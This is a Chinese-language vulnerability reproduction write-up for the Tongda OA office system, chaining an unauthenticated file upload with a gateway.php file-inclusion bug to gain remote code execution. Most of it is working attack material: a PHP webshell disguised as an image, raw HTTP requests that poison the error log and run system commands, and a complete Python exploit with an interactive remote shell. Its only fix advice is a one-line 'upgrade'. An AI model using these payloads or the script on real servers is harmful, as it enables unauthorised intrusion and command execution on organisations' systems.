通达+oa+php+文件+乱,通达OA 任意文件上传+文件包含导致RCE

0x00 漏洞描述

ispirit/im/upload.php存在绕过登录(任意文件上传漏洞)，结合gateway.php处存在的文件包含漏洞，最终导致getshell，或者直接利用日志文件写入shell，然后结合文件包含漏洞getshell

0x01 漏洞影响版本

通达OA V11版 <= 11.3 20200103

通达OA 2017版 <= 10.19 20190522

通达OA 2016版 <= 9.13 20170710

通达OA 2015版 <= 8.15 20160722

通达OA 2013增强版 <= 7.25 20141211

通达OA 2013版 <= 6.20 20141017

注：有些版本gateway.php路径不同

如2013:

/ispirit/im/upload.php

/ispirit/interface/gateway.php

2017：

/ispirit/im/upload.php

/mac/gateway.php

本文使用的v11版本路径为

/ispirit/im/upload.php

/ispirit/interface/gateway.php

0x02 漏洞复现

1、下载通达OA 11.2，https://cdndown.tongda2000.com/oa/2019/TDOA11.2.exe，点击安装

2、访问任意文件上传漏洞路径/ispirit/im/upload.php

3、构造上传界面，action的内容是目标地址

4、制作图片马

//保存为jpg

$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");

$exec=$phpwsh->exec("cmd.exe /c ".$_POST['cmd']."");

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

5、浏览器打开制作的上传文件，上传图片马

6、点击”提交查询”，使用burp抓包，可以看到成功上传

7、2009是文件夹名，1301311124|test.jpg是文件名,要把 | 修改成点，请求相对应版本的gateway.php ，修改对应版本路径文件，和对应图片马上传的路径和文件名，header头添加Content-Type: application/x-www-form-urlencoded

8、不利用任意文件上传漏洞，包含日志文件getshell

GET /<?php $phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");$exec=$phpwsh->exec("cmd.exe /c ".$_POST['cmd'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput;?> HTTP/1.1

Host: 192.168.77.135

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Cookie: PHPSESSID=fb2sahetm8tsjn65i0kramf506; KEY_RANDOMDATA=2025

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

9、查看日志文件oa.error.log，发现成功写入

10、构造数据包，发现包含日志文件并成功执行命令

POST /ispirit/interface/gateway.php HTTP/1.1

Host: 192.168.77.135

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Cookie: PHPSESSID=fb2sahetm8tsjn65i0kramf506; KEY_RANDOMDATA=7203

DNT: 1

Connection: close

Content-Length: 66

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../nginx/logs/oa.error.log"}&cmd=net user

11、使用工具，下载https://github.com/fuhei/tongda_rce，#注意需要修改下脚本里的文件夹，不修改直接运行脚本，会提示不存在漏洞(因为文件夹名不对)

#!/usr/bin/env python3

# -*- encoding: utf-8 -*-

'''

@File : tongda_rce.py

@Time : 2020/03/18 11:59:48

@Author : fuhei

@Version : 1.0

@Blog : http://www.lovei.org

'''

import requests

import re

import sys

def check(url):

try:

url1 = url + '/ispirit/im/upload.php'

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"}

data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php \r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"

result = requests.post(url1, headers=headers, data=data)

name = "".join(re.findall("2009_(.+?)\|",result.text))

url2 = url + '/ispirit/interface/gateway.php'

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}

data = {"json": "{\"url\":\"../../../general/../attach/im/2009/%s.f.jpg\"}" % (name), "f": "echo fffhhh"}

result = requests.post(url2, headers=headers, data=data)

if result.status_code == 200 and 'fffhhh' in result.text:

# print("[+] Remote code execution vulnerability exists at the target address")

return name

else:

return False

except:

pass

def command(url, name,command="whoami"):

url = url + '/ispirit/interface/gateway.php'

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}

data = {"json": "{\"url\":\"../../../general/../attach/im/2009/%s.f.jpg\"}" % (name), "f": "%s" % command}

result = requests.post(url, headers=headers, data=data)

while(1):

command = input("fuhei@shell$ ")

if command == 'exit' or command == 'quit':

break

else:

data = {"json": "{\"url\":\"../../../general/../attach/im/2009/%s.f.jpg\"}" % (name), "f": "%s" % command}

result = requests.post(url, headers=headers, data=data)

print(result.text)

if __name__ == '__main__':

url = sys.argv[1]

name = check(url)

if name:

print("[+] Remote code execution vulnerability exists at the target address")

command(url,name)

else:

print("[-] There is no remote code execution vulnerability in the target address")

12、运行脚本

0x03 修复建议

升级版本

喜欢 (4)or分享 (0)